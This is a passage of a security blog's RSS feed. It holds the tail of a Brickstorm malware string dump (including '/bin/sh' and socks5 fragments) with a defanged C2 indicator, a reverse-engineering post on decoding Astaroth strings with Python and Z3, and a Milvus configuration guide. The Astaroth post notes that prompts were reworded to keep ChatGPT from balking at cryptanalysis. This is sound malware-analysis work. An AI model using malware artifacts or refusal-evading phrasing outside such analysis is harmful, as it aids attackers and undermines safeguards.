%#v&quot;<br>ENOENT&#39;<br>ENOEXEC&#39;<br>ECHILD&#39;<br>EAGAIN&#39;<br>ENOMEM&#39;<br>EACCES&quot;<br>EFAULT&#39;<br>ENOTBLK&#39;<br>EEXIST&#39;<br>ENOTDIR&quot;<br>EISDIR&#39;<br>EINVAL&#39;<br>EMFILE&#39;<br>ENOTTY&#39;<br>ETXTBSY&#39;<br>ENOSPC&#39;<br>ESPIPE&#39;<br>EMLINK&#39;<br>EDOM&#39;<br>ERANGE&#39;<br>EDEADLK&#39;<br>ENOLCK&#39;<br>ENOSYS&#39;<br>ENOMSG&#39;<br>ECHRNG&#39;<br>EL3HLT&#39;<br>EL3RST&#39;<br>ELNRNG&#39;<br>EUNATCH&#39;<br>ENOCSI&#39;<br>ENOANO&quot;<br>EBADSLT&#39;<br>EBFONT&#39;<br>ENOSTR&#39;<br>ENODATA&#39;<br>ENONET&#39;<br>ENOPKG&#39;<br>EREMOTE&#39;<br>EADV&#39;<br>ESRMNT&quot;<br>EPROTO&#39;<br>EDOTDOT&#39;<br>EBADMSG&#39;<br>EREMCHG&#39;<br>ELIBACC&#39;<br>ELIBBAD&#39;<br>ELIBSCN&#39;<br>ELIBMAX&#39;<br>EILSEQ&#39;<br>EUSERS&#39;<br>ENOBUFS&#39;<br>EUCLEAN&#39;<br>ENOTNAM&#39;<br>ENAVAIL&#39;<br>EISNAM&#39;<br>ENOKEY&#39;<br>ERFKILL&#39;<br>SIGHUP&#39;<br>hangup&#39;<br>SIGINT&#39;<br>SIGQUIT&#39;<br>quit&#39;<br>SIGILL&#39;<br>SIGTRAP&#39;<br>SIGABRT&quot;<br>aborted&#39;<br>SIGBUS&#39;<br>SIGFPE&#39;<br>SIGKILL&#39;<br>killed&#39;<br>SIGUSR1&#39;<br>SIGSEGV&quot;<br>SIGUSR2&#39;<br>SIGPIPE&#39;<br>SIGALRM&quot;<br>SIGTERM&#39;<br>SIGCHLD&#39;<br>SIGCONT&#39;<br>SIGSTOP&#39;<br>stopped&#39;<br>SIGTTIN&#39;<br>SIGTTOU&#39;<br>SIGURG&#39;<br>SIGXCPU&#39;<br>SIGXFSZ&#39;<br>SIGPROF&#39;<br>SIGPWR&#39;<br>SIGSYS&#39;<br>solaris&#39;<br>netbsd&#39;<br>openbsd&#39;<br>/&#39;<br>recvmsg&#39;<br>android&#39;<br>illumos&#39;<br>windows&#39;<br>tcp6&#39;<br>udp6&#39;<br>/&#39;<br>/&#39;<br>read&#39;<br>none&#39;<br>quic hp&#39;<br>quic hp&#39;<br>tls13 &#39;<br>quic ku&#39;<br> &#39;<br> &#39;<br>server&#39;<br>init&#39;<br>suspend&#39;<br>none&#39;<br>null&#39;<br>server&#39;<br>cc|)&#39;<br>exit&#39;<br>Remove&#39;<br>closed&#39;<br>timeout&#39;<br>\xff&#39;<br>socks5&#39;<br>tcp4&#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>: &#39;<br>&quot;&#39;<br>;&#39;<br>=&#39;<br>: &#39;<br>:&#39;<br>]&#39;<br>http&#39;<br>Upgrade&#39;<br>13&#39;<br>, &#39;<br>Host&#39;<br>Upgrade&#39;<br>upgrade&#39;<br>http&#39;<br>:&#39;<br>Basic &#39;<br>CONNECT&quot;<br> &#39;<br>socks &#39;<br>tcp4&#39;<br>Origin&#39;<br>smux&#39;<br>http&#39;<br>socks5&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>:&#39;<br>[/]?&#39;<br>=&#39;<br>:&#39;<br>=&#39;<br>=&#39;<br>&amp;;&#39;<br>v&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>&amp;&#39;<br>&amp;lt;&#39;<br>&gt;&#39;<br>&amp;gt;&#39;<br>&quot;&#39;<br>%v&#39;<br>%v&#39;<br>/&#39;<br>Post&#39;<br>/api&#39;<br>windows&#39;<br>/&#39;<br>/&#39;<br>pre&gt;\n&#39;<br>/&#39;<br>/pre&gt;\n&#39;<br>%.2fMB&#39;<br>%.2fGB&#39;<br>%.2fTB&#39;<br>%.2fEB&#39;<br>HEAD&#39;<br>W/&#39;<br>W/&#39;<br>W/&#39;<br>Etag&#39;<br>Etag&#39;<br>Etag&#39;<br>Etag&#39;<br>./&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>/&#39;<br>bytes=&#39;<br>,&#39;<br>-&#39;<br>nil EOF&#39;<br>/&#39;<br># &#39;<br> &#39;<br>exit&#39;<br>cd&#39;<br>n&#39;<br>nil EOF&#39;<br>/bin/sh&#39;<br>-c&#39;<br>nil EOF&#39;<br>ICMP&#39;<br>n&#39;<br> &#39;<br> &#39;<br>/&#39;<br>:&#39;<br>SETENV1&#39;<br>SETENV2&#39;<br>true&#39;<br>TERM&#39;<br>USER&#39;<br>PATH&#39;<br>TERM&#39;<br>USER&#39;<br>true&#39;<br>PATH&#39;</pre><h3>IOCs</h3><pre>wss://natsupport[.]net/api</pre><h3>References</h3><p>1: <a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign">https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign</a></p><p>2: <a href="https://cloud.google.com/blog/topics/threat-intelligence/gostringungarbler-deobfuscating-strings-in-garbled-binaries">https://cloud.google.com/blog/topics/threat-intelligence/gostringungarbler-deobfuscating-strings-in-garbled-binaries</a></p><p>3: <a href="https://research.openanalysis.net/garble/go/obfuscation/strings/2023/08/03/garble.html">https://research.openanalysis.net/garble/go/obfuscation/strings/2023/08/03/garble.html</a></p><p>4: <a href="https://github.com/burrowers/garble">https://github.com/burrowers/garble</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=b0a60828b3cc" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/decoding-brickstorms-garble-strings-b0a60828b3cc">Decoding Brickstorms Garble strings</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Utilizing ChatGPT for Decoding Astaroth Strings]]></title>
            <link>https://medium.com/walmartglobaltech/utilizing-chatgpt-for-decoding-astaroth-strings-80815e4dfefb?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/80815e4dfefb</guid>
            <category><![CDATA[reverse-engineering]]></category>
            <category><![CDATA[malware]]></category>
            <category><![CDATA[chatgpt]]></category>
            <category><![CDATA[infosec]]></category>
            <dc:creator><![CDATA[Jason Reaves]]></dc:creator>
            <pubDate>Mon, 24 Nov 2025 15:48:52 GMT</pubDate>
            <atom:updated>2025-11-24T15:48:50.289Z</atom:updated>
            <content:encoded><![CDATA[<p>By: Jason Reaves</p><p>In this blog I want to demonstrate a scenario that I run into occasionally as a Reverse Engineer. There are plenty of excellent write-ups on Astaroth from a technical perspective[1,2] so I decided to utilize existing analysis and leverage ChatGPT[5] for aiding in analysis of a binary sample.</p><p>The sample below was primarily leveraged to turn existing work into a script that leverages a SMT[6] to find the key for the string decoding instead of relying on recovering the key from the binary:</p><pre>d3737da15c3439efd0aecf0492573c81bb24d25c6ce510da6da048cee671e3d7</pre><p>It’s good when using others research to verify the same code patterns, in this case I used their work to quickly map out the relevant decrypt functions in the binary:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/756/1*R9VjvyGcd1TKougOIuamgQ.png" /></figure><p>Now I take the code from both blogs and use that info to combine them into a single function based primarily on the Acronis blog code:</p><pre>def decode(s):<br>    #decrypt<br>    key = b&quot;XYQMDOW8&quot;<br>    s = bytes.fromhex(s)<br>    out1 = b&quot;&quot;<br>    for i in range(1, len(s)):<br>        k = s[i - 1]<br>        b = s[i]<br>        a = b ^ key[(i - 1) % len(key)]<br>        if a &gt; k:<br>            a = a - k<br>        else:<br>            a = a + 255 - k<br>        out1 += bytes([a &amp; 0xff])<br><br>    #decrypt2<br>    out2 = b&quot;&quot;<br>    for c in out1[::-1]:<br>        c = ~(c - 0x0A) &amp; 0xFF<br>        out2 += bytes([c])<br><br>    #decrypt3<br>    key = out2[0] - 0x41<br>    out3 = b&quot;&quot;<br>    for i in range(1, len(out2), 2):<br>        c = out2[i + 1] - 0x41 + ((out2[i] - 0x41) * 25) - key - 0x64<br>        out3 += bytes([c &amp; 0xFF])<br><br>    return out3</pre><p>I noticed when questioning ChatGPT you have to be slightly cognizant of the phrasing else ChatGPT will get stuck in a cycle of complaining about cryptanalysis.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*l-HKWdi0Okcj8PwGf7GD1g.png" /></figure><p>After inputting the code, ChatGPT expected the input and output mentioned previously:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZhfCtip50KY6Le-UzS6kuA.png" /></figure><p>Next it dumps out the code with the additional Z3 functionality:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QkKu1-XP9HZ7IAXkxZn6UQ.png" /></figure><p>Running the code out of the box gave an incorrect key:</p><pre> % python3 chatgpt.py <br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;x9QMDOW8&#39;<br>Recovered key (ASCII): x9QMDOW8</pre><p>So, a character constraint is added based on known keys:</p><pre>allowed_vals = [ord(c) for c in &quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&quot;]<br>charset_constraints = [Or([key[i] == v for v in allowed_vals]) for i in range(len(key))]<br>solver.add(charset_constraints)</pre><p>This gives us the correct key:</p><pre>% python3 chatgpt.py<br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;XYQMDOW8&#39;<br>Recovered key (ASCII): XYQMDOW8</pre><p>In this blog[2] there is also listed more strings we can try that are using a different key so we can test further:</p><pre>decode((int)L&quot;87647C0D8B7C0AE3F2E8F0961FDF&quot;, &amp;JoeBox, a1, a2, a3);// JoeBox</pre><pre>s_hex = &quot;87647C0D8B7C0AE3F2E8F0961FDF&quot;<br>expected_out3 = b&quot;JoeBox&quot;<br><br>% python3 chatgpt.py<br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;XY7F85HH&#39;<br>Recovered key (ASCII): XY7F85HH</pre><p>Close but let’s try a different string that is longer:</p><pre>s_hex = &quot;726B7210966F1AEFF99801F4F295602EB9D9C0B335C0B55C48A5&quot;<br>expected_out3 = b&quot;HookExplorer&quot;<br><br>% python3 chatgpt.py<br>Z3 check: sat<br>Recovered key (raw bytes): b&#39;XY7F852V&#39;<br>Recovered key (ASCII): XY7F852V</pre><p>That one produced the correct key so it looks like we would probably need two known strings to then test the produced key against or we just need to focus on specific length strings and loop through them looking for potential keys for other samples.</p><h3>References</h3><p>1: <a href="https://www.acronis.com/en/tru/posts/astaroth-unleashed/">https://www.acronis.com/en/tru/posts/astaroth-unleashed/</a></p><p>2: <a href="https://github.com/purplededa/Astaroth---Malware-Analysis-Report?tab=readme-ov-file">https://github.com/purplededa/Astaroth---Malware-Analysis-Report?tab=readme-ov-file</a></p><p>3: <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/">https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/</a></p><p>4: <a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth">https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth</a></p><p>5: <a href="https://chatgpt.com/">https://chatgpt.com/</a></p><p>6: <a href="https://github.com/Z3Prover/z3">https://github.com/Z3Prover/z3</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=80815e4dfefb" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/utilizing-chatgpt-for-decoding-astaroth-strings-80815e4dfefb">Utilizing ChatGPT for Decoding Astaroth Strings</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[Demystifying Milvus Configuration: A Data Scientist’s Guide to Milvus Resource Requirements]]></title>
            <link>https://medium.com/walmartglobaltech/demystifying-milvus-configuration-a-data-scientists-guide-to-milvus-resource-requirements-3f9aaf2d0dfc?source=rss----905ea2b3d4d1---4</link>
            <guid isPermaLink="false">https://medium.com/p/3f9aaf2d0dfc</guid>
            <category><![CDATA[genai]]></category>
            <category><![CDATA[llm]]></category>
            <category><![CDATA[data-science]]></category>
            <category><![CDATA[machine-learning]]></category>
            <dc:creator><![CDATA[Subrat Sekhar Sahu]]></dc:creator>
            <pubDate>Wed, 15 Oct 2025 04:01:19 GMT</pubDate>
            <atom:updated>2025-10-15T04:01:14.956Z</atom:updated>
            <content:encoded><![CDATA[<p>You’ve built your model, generated your embeddings, and you are ready to power a real-time similarity search application. You chose Milvus, a popular open-source vector database and it is brilliant. But then you look at the deployment configuration and you see a wall of Helm config YAML.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/411/1*DO3xZ2IgQ9K7mowyHiuQag.png" /></figure><p>What does it all mean? Why does a <em>queryNode</em> need a whopping 16GB of RAM while a <em>queryCoordinator</em> (as we’ll see later) only needs 0.5GB?</p><p><strong>The Challenge: From Data Science to DevOps</strong></p><p>This isn’t just a configuration file; it is a blueprint for your application’s performance, scalability and cost. For many data scientists, it is an intimidating black box. This creates several key challenges:</p><ul><li><strong>Performance Bottlenecks:</strong> When search is slow or data ingestion stalls, where do you look? Is it a CPU limit on the proxy? A memory shortage on the <em>queryNode</em>? Guessing is inefficient and can lead to a frustrating user experience.</li><li><strong>Communication Gaps</strong>: It’s difficult to collaborate with your Infrastructure or DevOps team if you can’t speak their language. Telling them “search is slow” is far less effective than saying “Our query volume has doubled and I suspect we’re hitting a memory ceiling on our <em>queryNodes</em>. Can we monitor their usage and plan to scale them up?”</li><li><strong>Inefficient Scaling and Cost</strong>: Without understanding the role of each component, you might over-provision resources leading to wasted cloud spend or under-provision limiting your application’s performance.</li></ul><p>Today, we’re going to break down a typical helm config yaml for Milvus. Specifically, we will look at the resources requirements mentioned in the config and discuss how these affect the performance of VectorDB. This understanding will help diagnose performance issues, plan for scale and communicate effectively with Infrastructure team. The following discussion applies to a Milvus instance deployed in distributed mode (on Kubernetes) using Milvus Helm charts. However, the learnings can be extended to make resource related decisions for other deployment modes as well.</p><p><strong>Precursors</strong></p><p>· <strong>Milvus </strong>is an open-source vector database specifically designed for efficient similarity search. It helps in storing, indexing and querying vector embeddings generated from unstructured data, enabling AI applications like semantic search, image recognition and recommendation systems to quickly find semantically similar data.</p><p>· <strong>Helm</strong> is the package manager for Kubernetes. It bundles all necessary Kubernetes resources and configurations into a single, version-controlled unit called a “Chart”. For Milvus specifically, the official Milvus Helm Chart is used to easily configure resources like CPU, memory and replicas for each of its services (e.g., queryNode, minio, proxy) by providing simple YAML override values.</p><p><strong>The Big Picture: A City of Microservices</strong></p><p>Think of a Milvus cluster not as a single program, but as a group of specialized workers. Each worker has a specific job and they all communicate to get things done.</p><p>These workers can be grouped into three main categories:</p><ol><li>The Brains (Coordinators): The management layer that directs traffic and keeps track of everything.</li><li>The Brawn (Worker Nodes): The heavy lifters that handle data, build indexes and run searches.</li><li>The Backbone (Dependencies): The essential infrastructure like storage, messaging and memory.</li></ol><p><strong>The Brains: The Coordinator Nodes</strong></p><p>These are the managers. They are generally lightweight because they delegate the hard work. They mostly handle metadata, not the raw vector data itself.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pNteXIDT9WnzwQstlFdoUg.png" /></figure><p>💡 Key Insight: Notice how small the resource requests are for these components (0.5 to 1 CPU and 0.5 to 2GiB of memory). They are orchestrators, not workers. Keeping them separate allows Milvus to scale its management and data-handling capabilities independently.</p><p><strong>The Brawn: The Worker Nodes</strong></p><p>This is where the magic and the heavy lifting happens. These are the nodes whose resource allocation will most directly impact the application’s performance.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/892/1*nPMZwf7-QmUgu7ipEAtCpg.png" /></figure><p>💡 Key Insight: The queryNode has the highest memory request (16GiB) for a reason. Vector search is a memory game. The more vectors you can fit into RAM, the faster your searches will be. When planning capacity, memory of queryNode is the most important metric.</p><p><strong>The Backbone: The Dependencies</strong></p><p>Milvus doesn’t reinvent the wheel for basic infrastructure. It relies on battle-tested open-source projects.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/892/1*hSQVVFY2PvpB5JLAUS4lIA.png" /></figure><p>💡 And a bonus —</p><ul><li>attu: 1 replica, 1 CPU, 1GiB RAM — This is the official web-based GUI for Milvus. It’s a handy tool for browsing collections and running quick tests, with minimal resource needs.</li></ul><p><strong>Putting It All Together: The Lifecycle of a Query</strong></p><ol><li>Your app (via the SDK) sends a search request to the Proxy.</li><li>The Proxy forwards it to the Query Coordinator.</li><li>The Query Coordinator checks its metadata (from etcd) to see which Query Nodes hold the relevant data.</li><li>It sends a search task to the right Query Node(s) via the Kafka message bus.</li><li>Each Query Node loads the necessary index/data into its massive RAM and performs the lightning-fast vector search.</li><li>The results travel back up the chain to your application.</li></ol><p><strong>Your Takeaways as a Data Scientist</strong></p><ul><li>Query Performance is Memory: If you need faster searches or want to search over more data, focus on the queryNode resources.</li><li>Ingestion Throughput is Proxy/DataNode: If you’re struggling to insert data quickly, you might need to scale your proxy and dataNode replicas.</li><li>Base Configuration is a Starting Point: The config we reviewed is a solid, well-provisioned starting point. Your ideal setup will depend on your vector dimensionality, the number of vectors, and your query-per-second (QPS) requirements.</li><li>Speak the Language: Now, instead of saying “search is slow,” you can have a more informed conversation: “I suspect we’re hitting a memory ceiling on our queryNodes. Can we monitor their memory usage and consider scaling them up?”</li></ul><p>Hopefully, the resource requirements for Milvus looks a little less like a mystery and a lot more like a blueprint for your Vector searches.</p><p>References:</p><p>· <a href="https://milvus.io/tools/sizing">https://milvus.io/tools/sizing</a></p><p>· <a href="https://github.com/zilliztech/milvus-helm">https://github.com/zilliztech/milvus-helm</a></p><img src="https://medium.com/_/stat?event=post.clientViewed&referrerSource=full_rss&postId=3f9aaf2d0dfc" width="1" height="1" alt=""><hr><p><a href="https://medium.com/walmartglobaltech/demystifying-milvus-configuration-a-data-scientists-guide-to-milvus-resource-requirements-3f9aaf2d0dfc">Demystifying Milvus Configuration: A Data Scientist’s Guide to Milvus Resource Requirements</a> was originally published in <a href="https://medium.com/walmartglobaltech">Walmart Global Tech Blog</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
    </channel>
</rss>